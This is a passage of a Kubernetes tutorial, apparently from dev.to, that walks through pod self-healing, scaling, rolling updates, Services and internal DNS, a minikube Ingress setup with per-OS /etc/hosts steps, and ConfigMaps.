kubectl get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Exercise 6: Self-Healing in Action
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Delete one of the pods manually&lt;/span&gt;
kubectl delete pod &amp;lt;one-of-your-pod-names&amp;gt;

&lt;span class="c"&gt;# Watch Kubernetes immediately create a replacement&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Within seconds, a new Pod appears. This is self-healing — the controller loop noticed the gap between desired state (3 replicas) and actual state (2 replicas) and corrected it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Exercise 7: Scaling
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Scale up to 5 replicas&lt;/span&gt;
kubectl scale deployment my-app &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;5
kubectl get pods

&lt;span class="c"&gt;# Or edit the YAML: change replicas: 3 to replicas: 5, then:&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; deployment.yaml   &lt;span class="c"&gt;# The declarative way&lt;/span&gt;

&lt;span class="c"&gt;# Scale back down&lt;/span&gt;
kubectl scale deployment my-app &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Rolling Updates: Zero Downtime Deploys
&lt;/h3&gt;

&lt;p&gt;When you update a Deployment (e.g., a new image version), Kubernetes performs a rolling update controlled by &lt;code&gt;maxUnavailable&lt;/code&gt; and &lt;code&gt;maxSurge&lt;/code&gt;. With 3 replicas and both set to 25% (rounded up to 1), the actual behavior looks like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcjtiwtee1k0bz8ofvw9u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcjtiwtee1k0bz8ofvw9u.png" alt="image" width="800" height="703"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The exact pacing depends on your &lt;code&gt;maxUnavailable&lt;/code&gt; and &lt;code&gt;maxSurge&lt;/code&gt; settings — Kubernetes may create or terminate multiple Pods at once for faster rollouts.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Trigger a rolling update by changing the image version&lt;/span&gt;
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;image deployment/my-app my-app&lt;span class="o"&gt;=&lt;/span&gt;nginx:1.26

&lt;span class="c"&gt;# Watch the rollout&lt;/span&gt;
kubectl rollout status deployment/my-app

&lt;span class="c"&gt;# View rollout history&lt;/span&gt;
kubectl rollout &lt;span class="nb"&gt;history &lt;/span&gt;deployment/my-app

&lt;span class="c"&gt;# Rollback if needed!&lt;/span&gt;
kubectl rollout undo deployment/my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Part 6 — Networking: Services and How Apps Talk to Each Other
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Pods Are Ephemeral
&lt;/h3&gt;

&lt;p&gt;Pods get new IP addresses every time they're created. Their IPs are only valid inside the cluster network. You can't hardcode Pod IPs — they'll change whenever a Pod restarts or gets rescheduled. This is why Services exist.&lt;/p&gt;

&lt;h3&gt;
  
  
  Service Types
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flm644w17n06j33pidt8l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flm644w17n06j33pidt8l.png" alt="image" width="800" height="1068"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ClusterIP&lt;/strong&gt; (default)&lt;br&gt;
Only reachable &lt;em&gt;within&lt;/em&gt; the cluster. Used for internal service-to-service communication. Gets a stable virtual IP and a DNS name.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;NodePort&lt;/strong&gt;&lt;br&gt;
Exposes the service on a static port (30000–32767) on every node's IP. Accessible from outside via &lt;code&gt;&amp;lt;NodeIP&amp;gt;:&amp;lt;NodePort&amp;gt;&lt;/code&gt;. Useful for local development and testing, but &lt;strong&gt;not recommended for production&lt;/strong&gt; — it exposes a port on every node and bypasses proper load balancing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;LoadBalancer&lt;/strong&gt;&lt;br&gt;
Provisions an external load balancer from your cloud provider (AWS, GCP, Azure, etc.), giving you a public IP or hostname. This is the standard way to expose public-facing apps in production.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ExternalName&lt;/strong&gt;&lt;br&gt;
Maps a Service to an external DNS name. Useful for integrating with external services (like a managed database) without hardcoding URLs in your app.&lt;/p&gt;
&lt;h3&gt;
  
  
  Service YAML
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# service.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Service&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app-service&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;selector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;          &lt;span class="c1"&gt;# Routes traffic to Pods with this label&lt;/span&gt;
  &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;TCP&lt;/span&gt;
    &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;             &lt;span class="c1"&gt;# Port the Service listens on&lt;/span&gt;
    &lt;span class="na"&gt;targetPort&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;       &lt;span class="c1"&gt;# Port on the Pod to forward to&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClusterIP&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Exercise 8: Services and Internal DNS
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; service.yaml

&lt;span class="c"&gt;# Every Service gets an automatic DNS name inside the cluster:&lt;/span&gt;
&lt;span class="c"&gt;# Format: &amp;lt;service-name&amp;gt;.&amp;lt;namespace&amp;gt;.svc.cluster.local&lt;/span&gt;
&lt;span class="c"&gt;# e.g.:   my-app-service.default.svc.cluster.local&lt;/span&gt;
&lt;span class="c"&gt;# Within the same namespace, just: my-app-service&lt;/span&gt;

&lt;span class="c"&gt;# Test DNS resolution from inside the cluster&lt;/span&gt;
kubectl run tmp-shell &lt;span class="nt"&gt;--rm&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;curlimages/curl &lt;span class="nt"&gt;--&lt;/span&gt; sh
&lt;span class="c"&gt;# Inside the shell:&lt;/span&gt;
curl my-app-service
curl my-app-service.default.svc.cluster.local   &lt;span class="c"&gt;# fully-qualified form&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h3&gt;
  
  
  Ingress: The Smart HTTP Router
&lt;/h3&gt;

&lt;p&gt;For production web traffic, you typically put an &lt;strong&gt;Ingress&lt;/strong&gt; in front of your Services. An Ingress routes HTTP/HTTPS traffic based on rules (hostnames, URL paths).&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Critical:&lt;/strong&gt; An Ingress resource by itself does nothing. It requires an &lt;strong&gt;Ingress Controller&lt;/strong&gt; to be installed in the cluster — a running component that reads Ingress objects and actually configures the routing. Popular controllers include nginx, Traefik, and HAProxy. Without a controller, your Ingress YAML is just ignored.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp29zsf72mj92q7w6gwa8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp29zsf72mj92q7w6gwa8.png" alt="image" width="800" height="281"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  Exercise 9b: End-to-End Ingress Walkthrough
&lt;/h3&gt;

&lt;p&gt;This exercise builds on the &lt;code&gt;my-app&lt;/code&gt; Deployment and &lt;code&gt;my-app-service&lt;/code&gt; Service from earlier. By the end you'll hit a real hostname routed through the Ingress controller to your Pods.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Mac users — read this before starting:&lt;/strong&gt; On Mac, minikube runs inside a VM or Docker container. The minikube IP (e.g. &lt;code&gt;192.168.49.2&lt;/code&gt;) lives inside that VM's private network and is &lt;strong&gt;not directly reachable from your Mac&lt;/strong&gt;. The steps below have a Mac-specific section to handle this. Linux and Windows users can follow the standard path.&lt;/p&gt;
&lt;/blockquote&gt;



&lt;p&gt;&lt;strong&gt;Step 1 — Enable the Ingress controller (minikube)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;minikube addons &lt;span class="nb"&gt;enable &lt;/span&gt;ingress

&lt;span class="c"&gt;# Wait until the controller Pod is Running (takes ~60 seconds)&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-n&lt;/span&gt; ingress-nginx &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;span class="c"&gt;# Look for: ingress-nginx-controller-xxx   Running&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;strong&gt;Step 2 — Create the Ingress resource&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Save the following as &lt;code&gt;ingress.yaml&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ingress.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;networking.k8s.io/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Ingress&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app-ingress&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;nginx.ingress.kubernetes.io/rewrite-target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;rules&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;host&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;myapp.local&lt;/span&gt;
    &lt;span class="na"&gt;http&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;paths&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/&lt;/span&gt;
        &lt;span class="na"&gt;pathType&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Prefix&lt;/span&gt;
        &lt;span class="na"&gt;backend&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app-service&lt;/span&gt;
            &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
              &lt;span class="na"&gt;number&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; ingress.yaml

&lt;span class="c"&gt;# Verify the Ingress was created and has an address assigned&lt;/span&gt;
kubectl get ingress my-app-ingress
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output (ADDRESS populates after ~30 seconds):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;NAME             CLASS   HOSTS        ADDRESS        PORTS   AGE
my-app-ingress   nginx   myapp.local  192.168.49.2   80      45s
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If ADDRESS is blank after a minute, the Ingress controller isn't running yet — recheck Step 1.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Step 3 — Make the hostname reachable (OS-specific)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This is where Mac and Linux/Windows diverge.&lt;/p&gt;

&lt;h4&gt;
  
  
  🍎 Mac
&lt;/h4&gt;

&lt;p&gt;On Mac, the minikube IP is not routable from your host. You need &lt;code&gt;minikube tunnel&lt;/code&gt; to bridge your Mac's localhost into the cluster.&lt;/p&gt;

&lt;p&gt;Open a &lt;strong&gt;new terminal window&lt;/strong&gt; and run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;minikube tunnel
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It will prompt for your sudo password (it needs to bind to ports 80 and 443). Leave this terminal open for the entire exercise — closing it stops the tunnel.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ Tunnel successfully started
🏃 Starting tunnel for service my-app-ingress.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now add this line to &lt;code&gt;/etc/hosts&lt;/code&gt; (use &lt;code&gt;127.0.0.1&lt;/code&gt;, not the minikube IP):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;sh &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'echo "127.0.0.1   myapp.local" &amp;gt;&amp;gt; /etc/hosts'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  🐧 Linux
&lt;/h4&gt;

&lt;p&gt;The minikube IP is directly reachable on Linux. Get it and add it to &lt;code&gt;/etc/hosts&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;minikube ip&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="s2"&gt;   myapp.local"&lt;/span&gt; | &lt;span class="nb"&gt;sudo tee&lt;/span&gt; &lt;span class="nt"&gt;-a&lt;/span&gt; /etc/hosts
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  🪟 Windows
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;minikube ip   &lt;span class="c"&gt;# note the IP, e.g. 192.168.49.2&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Open &lt;code&gt;C:\Windows\System32\drivers\etc\hosts&lt;/code&gt; as Administrator in Notepad and add:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;192.168.49.2   myapp.local
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;strong&gt;Step 4 — Verify routing works&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Should return nginx HTML&lt;/span&gt;
curl http://myapp.local

&lt;span class="c"&gt;# Or open in your browser&lt;/span&gt;
open http://myapp.local        &lt;span class="c"&gt;# Mac&lt;/span&gt;
xdg-open http://myapp.local   &lt;span class="c"&gt;# Linux&lt;/span&gt;
&lt;span class="c"&gt;# Windows: just paste http://myapp.local into a browser&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see the nginx welcome page served through the Ingress controller.&lt;/p&gt;

&lt;p&gt;If you're on Mac and it still times out, confirm the tunnel is still running in its terminal window and that &lt;code&gt;/etc/hosts&lt;/code&gt; has &lt;code&gt;127.0.0.1&lt;/code&gt; (not the minikube IP).&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Step 5 — Inspect what Kubernetes created&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Full details of the Ingress, including routing rules and backend&lt;/span&gt;
kubectl describe ingress my-app-ingress
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Look for the &lt;code&gt;Rules&lt;/code&gt; section — it shows exactly which host + path maps to which Service and port.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Step 6 — Confirm the controller is doing the routing (optional deep-dive)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# The Ingress controller is just a Pod — you can see its access logs&lt;/span&gt;
kubectl logs &lt;span class="nt"&gt;-n&lt;/span&gt; ingress-nginx &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="si"&gt;$(&lt;/span&gt;kubectl get pods &lt;span class="nt"&gt;-n&lt;/span&gt; ingress-nginx &lt;span class="nt"&gt;-o&lt;/span&gt; name | &lt;span class="nb"&gt;grep &lt;/span&gt;controller&lt;span class="si"&gt;)&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--tail&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;20
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You'll see a new access log line appear each time you curl &lt;code&gt;myapp.local&lt;/code&gt;.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Step 7 — Clean up&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete ingress my-app-ingress

&lt;span class="c"&gt;# Remove the /etc/hosts entry&lt;/span&gt;
&lt;span class="c"&gt;# Mac/Linux — remove the line you added:&lt;/span&gt;
&lt;span class="nb"&gt;sudo sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;''&lt;/span&gt; &lt;span class="s1"&gt;'/myapp.local/d'&lt;/span&gt; /etc/hosts   &lt;span class="c"&gt;# Mac&lt;/span&gt;
&lt;span class="nb"&gt;sudo sed&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'/myapp.local/d'&lt;/span&gt; /etc/hosts       &lt;span class="c"&gt;# Linux&lt;/span&gt;

&lt;span class="c"&gt;# Mac only — stop the tunnel in its terminal window with Ctrl+C&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;&lt;strong&gt;What you just validated end-to-end:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkbgkp0sbsr2y1k8l2y81.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkbgkp0sbsr2y1k8l2y81.png" alt="image" width="800" height="275"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Why the difference?&lt;/strong&gt; On Linux, the minikube network is routed directly to your host. On Mac, minikube runs inside a VM whose network is isolated — &lt;code&gt;minikube tunnel&lt;/code&gt; creates a temporary route via localhost to bridge that gap.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Part 7 — Configuration and Secrets
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Why Not Hardcode Config?
&lt;/h3&gt;

&lt;p&gt;If you bake configuration into your container image, you need a new image for every environment (dev/staging/prod). Kubernetes provides two resources to inject config externally, keeping your images portable.&lt;/p&gt;

&lt;h3&gt;
  
  
  ConfigMaps
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# configmap.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-config&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;LOG_LEVEL&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;debug"&lt;/span&gt;
  &lt;span class="na"&gt;APP_ENV&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;staging"&lt;/span&gt;
  &lt;span class="na"&gt;config.json&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;{&lt;/span&gt;
      &lt;span class="s"&gt;"timeout": 30,&lt;/span&gt;
      &lt;span class="s"&gt;"retries": 3&lt;/span&gt;
    &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Using a ConfigMap in a Deployment:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx&lt;/span&gt;
    &lt;span class="na"&gt;env&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;LOG_LEVEL&lt;/span&gt;
      &lt;span class="na"&gt;valueFrom&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;configMapKeyRef&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-config&lt;/span&gt;
          &lt;span class="na"&gt;key&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;LOG_LEVEL&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;config-volume&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/config&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;config-volume&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-config&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;ConfigMap update behavior:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When a ConfigMap is mounted as a &lt;strong&gt;volume&lt;/strong&gt;, the files on disk are updated automatically — but with a delay (typically up to a minute). Importantly, the application must re-read the file to pick up changes. Apps that cache config at startup won't see updates without a restart.&lt;/li&gt;
&lt;li&gt;When a ConfigMap is used as an &lt;strong&gt;environment variable&lt;/strong&gt;, the Pod must be restarted to see updated values — env vars are set at container start and do not live-update.&lt;/li&gt;
